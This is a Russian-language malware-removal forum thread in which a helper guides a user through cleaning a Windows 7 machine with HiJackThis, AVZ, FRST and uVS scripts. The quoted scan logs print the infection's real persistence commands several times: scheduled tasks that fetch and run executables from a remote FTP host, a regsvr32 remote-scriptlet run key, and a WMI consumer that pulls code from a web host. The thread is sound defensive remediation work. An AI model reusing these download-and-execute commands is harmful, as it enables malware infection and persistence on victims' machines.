Вирус TODO: <文件说明>, lsmosee, mysa

[David Goliath]

Сегодня неизвестно откуда схватил несколько вирусов. Есть подорение на браузеры, т.к. появилось уведомление что расширение Tampermonkey и Adblock, которыми обновлены.

 

Антивирус Касперского перестал запускаться (днем работал), в безопасном режиме находит lsmosee.exe, mysa, mysa1, mysa2, mysa3... Лечит, но после перезагрузки они вновь появляются: сначала на секунду открывается командная строка где успеваешь заметить lsmose.exe - потом в Диспетчере Задач видишь TODO: <文件说明

 

Файлы:

CollectionLog-2018.10.30-22.26.zip

[SQ]

Здравствуйте,

Что за роутер у Вас?

HiJackThis (из каталога autologger)профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.

O2 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file)
O2-32 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file)
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll
O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: Any IP - Destination: my IP (Port 135 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: Any IP - Destination: my IP (Port 139 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: Any IP - Destination: my IP (Port 445 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: my IP - Destination: Any IP (Port 3333 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: my IP - Destination: Any IP (Port 5555 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: my IP - Destination: Any IP (Port 7777 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: my IP - Destination: Any IP (Port 9000 TCP) (mirrored) - Action: Block
O9-32 - Button: HKLM\..\{A52C66B3-D4A9-4d10-A67D-2BEF0A85AB3F}: WinToFlash Suggestor - (no file)
O9-32 - Tools menu item: HKLM\..\{A52C66B3-D4A9-4d10-A67D-2BEF0A85AB3F}: WinToFlash Suggestor options - (no file)
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task - {3519154C-227E-47F3-9CC9-12C3F05817F1} - (no file)
O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.0814ok.info:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f(1730 bytes)

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('c:\windows\debug\ok.dat','');
 QuarantineFile('c:\windows\help\lsmosee.exe>','');
 QuarantineFile('c:\windows\debug\item.dat>','');
 QuarantineFile('c:\windows\debug\item.dat','');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('Mysa2');
 DeleteFile('c:\windows\debug\item.dat','64');
 DeleteFile('c:\windows\debug\item.dat>','64');
 DeleteFile('c:\windows\help\lsmosee.exe>','64');
 DeleteSchedulerTask('ok');
 DeleteFile('c:\windows\debug\ok.dat','64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

quarantine.zip из папки AVZ загрузите этот архив через данную форму

 
Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.

 

Также сообщите если вы установили обновления для Windows 7 X64:
KB4012212
KB4012215

[David Goliath]

@SQ, 

Роутер Zyxel Keenetic Start, эти обновления не стоят, последний раз обновлся в 2016 году.

 

Вот этот пункт не смог проделать, в конце выходит ошибка с разными дурацкими именами вроде: Программа "zchcsvo" не работает

и сделайте полный образ автозапуска uVS.

 

 

[SQ]

Установите обновления которые я указал, похоже эксплуатируют уязвимость SMB. Роутер Вас случайно не настроен как мост (bridge). Закройте входящие  порты SMB (139, 445) в Windows Firewall.

- Скачайте Farbar Recovery Scan Tool  и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

• Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
• Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
  
• Нажмите кнопку Scan.
• После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
• Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

[David Goliath]

Обновления установил, порты закрыл, в роутере стоит Интернет центр - основной режим (есть Адаптер – подключение Ethernet-устройств к сети Wi-Fi, Усилитель – расширение зоны Wi-Fi, Точка доступа – расширение зоны Wi-Fi с подключением по Ethernet). Вот отчет:

 

Еще обновления ОС устанавливались аж в 2014 году.

Addition.txt

FRST.txt

[SQ]

Удалите Driver Booster (Iobit) через установку программ  в панели управления.

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  

  CreateRestorePoint:
  CloseProcesses:
  (TODO: <公司名>) C:\Windows\Temp\conhost.exe
  HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp0930.host:280/v.sct scrobj.dll
  Toolbar: HKU\S-1-5-21-3827699546-3351340401-287518781-1000 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
  Toolbar: HKU\S-1-5-21-3827699546-3351340401-287518781-1000 -> No Name - {093F479D-712E-46CD-9E06-62E734A05F68} -  No File
  FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
  FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
  S2 Ms7DB53800App; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
  S2 Ms7DB53800App; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
  File: C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
  File: C:\Windows\System32\Drivers\NVStrap.sys
  NETSVC: Ms7DB53800App -> no filepath.
  2018-10-30 23:20 - 2018-10-30 23:20 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
  2018-10-30 23:20 - 2018-10-30 23:20 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
  2018-10-30 23:20 - 2018-10-30 23:20 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
  2018-10-30 21:56 - 2018-10-30 23:20 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
  2018-10-30 21:56 - 2018-10-30 23:20 - 000003186 _____ C:\Windows\System32\Tasks\ok
  2018-10-30 19:11 - 2018-10-30 19:11 - 000000084 _____ C:\Program Files\Common Files\xp.dat
  2018-10-30 19:11 - 2018-10-30 19:11 - 000002587 _____ C:\Windows\cpu.txt
  2018-10-30 19:11 - 2018-10-30 19:11 - 000000406 _____ C:\Windows\config.txt
  2018-10-30 19:11 - 2018-10-30 19:11 - 000000336 _____ C:\Windows\pools.txt
  2018-10-30 15:51 - 2018-10-30 20:54 - 000000081 _____ C:\Windows\system32\s
  2018-10-30 15:51 - 2018-10-30 20:54 - 000000079 _____ C:\Windows\system32\ps
  2018-10-30 15:51 - 2018-10-30 20:54 - 000000077 _____ C:\Windows\system32\p
  2018-10-30 15:50 - 2018-10-30 23:18 - 000027136 _____ (Microsoft Corporation) C:\Windows\system\down.exe
  2018-10-30 15:49 - 2018-10-30 23:16 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
  2018-10-30 15:49 - 2018-10-30 15:49 - 000000005 _____ C:\Windows\system32\1.txt
  File: C:\Windows\system32\Drivers\cnnctfy2.sys
  2018-10-30 19:11 - 2018-10-30 19:11 - 000000084 _____ () C:\Program Files\Common Files\xp.dat
  2018-10-30 15:49 - 2018-10-30 23:16 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
  ContextMenuHandlers4: [RecuvaShellExt] -> [CC]{435E5DF5-2510-463C-B223-BDA47006D002} =>  -> No File
  ContextMenuHandlers6: [RecuvaShellExt] -> [CC]{435E5DF5-2510-463C-B223-BDA47006D002} =>  -> No File
  Task: {309A1AE4-23C6-4910-BA86-E015C6265E9A} - System32\Tasks\Driver Booster SkipUAC (Admin) => C:\Program Files (x86)\IObit\Driver Booster\5.4.0\DriverBooster.exe [2018-05-09] (IObit)
  Task: {443ACB49-E674-4211-992A-C592D5FB5041} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
  Task: {648044DC-5162-4020-AC77-E61F27FC6605} - \KMSAutoNet -> No File <==== ATTENTION
  Task: {867DE704-9923-468C-B386-C825A95E4869} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
  Task: {B288B299-E1ED-4B7C-BCAF-FF37D5CFDEFD} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
  Task: {E223C031-E820-4DD2-9BB2-7BF6A5869EF4} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
  Task: {E59750DE-AA91-4758-BDA7-18D8F3E1C8BC} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
  Task: {F0DFB3D7-35B2-46A6-A2FA-8AB2E7BE9C66} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
  Task: {FF358C8F-CAF9-476E-8AC6-767655F9F9DD} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
  2018-10-30 21:50 - 2018-10-30 23:19 - 002359296 _____ () C:\Windows\debug\item.dat
  HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dump_7DB53800.sys => ""="Driver"
  HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Ms7DB53800App => ""="Service"
  HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dump_7DB53800.sys => ""="Driver"
  HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ms7DB53800App => ""="Service"
  FirewallRules: [{9F6F365A-E4B2-46A8-89FD-9F7645AEF02C}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.4.0\DriverBooster.exe
  FirewallRules: [{E4C2056D-E613-46C9-B4BC-2B5AD1A63A9C}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.4.0\DriverBooster.exe
  FirewallRules: [{E3DEF500-0E3B-4740-883B-7EFF8B608DC0}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.4.0\DBDownloader.exe
  FirewallRules: [{6E43D2DA-5F3D-4930-B02A-721F1001DBCA}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.4.0\DBDownloader.exe
  FirewallRules: [{92A209F5-95AA-496E-816A-7F7C66B4C438}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.4.0\AutoUpdate.exe
  FirewallRules: [{160E4EC8-BEA4-418D-A88E-2B2CD739D3A8}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.4.0\AutoUpdate.exe
  c:\windows\help\lsmosee.exe
  Reboot:

• Запустите FRST и нажмите один раз на кнопку Fix и подождите.
• Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
• Обратите внимание, что компьютер будет перезагружен.
  

[David Goliath]

Прикрепляю

Fixlog.txt

[SQ]

Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.
 

[David Goliath]

Получилось в этот раз:

PC_2018-10-30_23-52-25_v4.1.1.7z

Изменено 30 октября, 2018 пользователем David Goliath

[SQ]

Выполните скрипт в uVS:

;uVS v4.0.11 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
BREG
delref HTTP://JS.FTP0930.HOST:280/V.SCT
delall %SystemRoot%\DEBUG\ITEM.DAT
delref HTTPS://DUCKDUCKGO.COM/?Q={SEARCHTERMS}
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.23.9\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.23.9\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.24.15\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.24.15\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.25.11\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.25.11\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.25.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.25.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.26.9\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.26.9\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.27.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.27.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.1\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.1\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.13\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.13\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.15\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.1\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.30.3\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.7\PSMACHINE_64.DLL
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\TEMP\3FE72A42.SYS
delall %SystemRoot%\DEBUG\OK.DAT
delall C:\WINDOWS\HELP\LSMOSEE.EXE
zoo C:\WINDOWS\UPDATE.EXE
restart 

Проверьте если образуется карантин, папка ZOO в каталоге uVS, если она не будет пустой то заархивируйте ее в zoo.zip и загрузите этот архив через данную форму

[David Goliath]

После последней операции компьютер после запуска виснет намертво

 

UPD: Все, загрузил, через Мозилу Фаерфокс вышло, предыдущее сообщение касается Хрома

Изменено 30 октября, 2018 пользователем David Goliath

[SQ]

Странное поведение с хромом. Сообщите, что с проблемой?

 

По хрому попробуйте отключить все расширения, возможно была подмена.

[David Goliath]

@SQ, 

Запустил таки Хром. Но Антивирус Каспесркого до сих пор не запускается, те вирусы не исчезли, в Диспетчере задач  до сих пор висит: conhost.exe TODO: <文件说明. Каспесркий в безопастном режиме продолжает находить копии mysa,  lsmose.exe 

 

Они даже в CCleaner видны в вклакде Автозагрузка - Запланированные задачи:

 

 

Task Mysa1 Microsoft Corporation rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa

Task Mysa2 cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p

Task Mysa3 cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe

Task ok Microsoft Corporation rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

Изменено 30 октября, 2018 пользователем David Goliath

[SQ]

Приложите пожалуйста новые логи утилиты автологгера, те что делали изначально.

[David Goliath]

новый

Проблема кажется решена, вручную удалил эти Mysa в планировщике задач (до этого их там не было), удалил lsmosee.exe в c/windows/debug. Антивирус запустился. Завтра примерно в 16:00 отпишусь

CollectionLog-2018.10.31-01.44.zip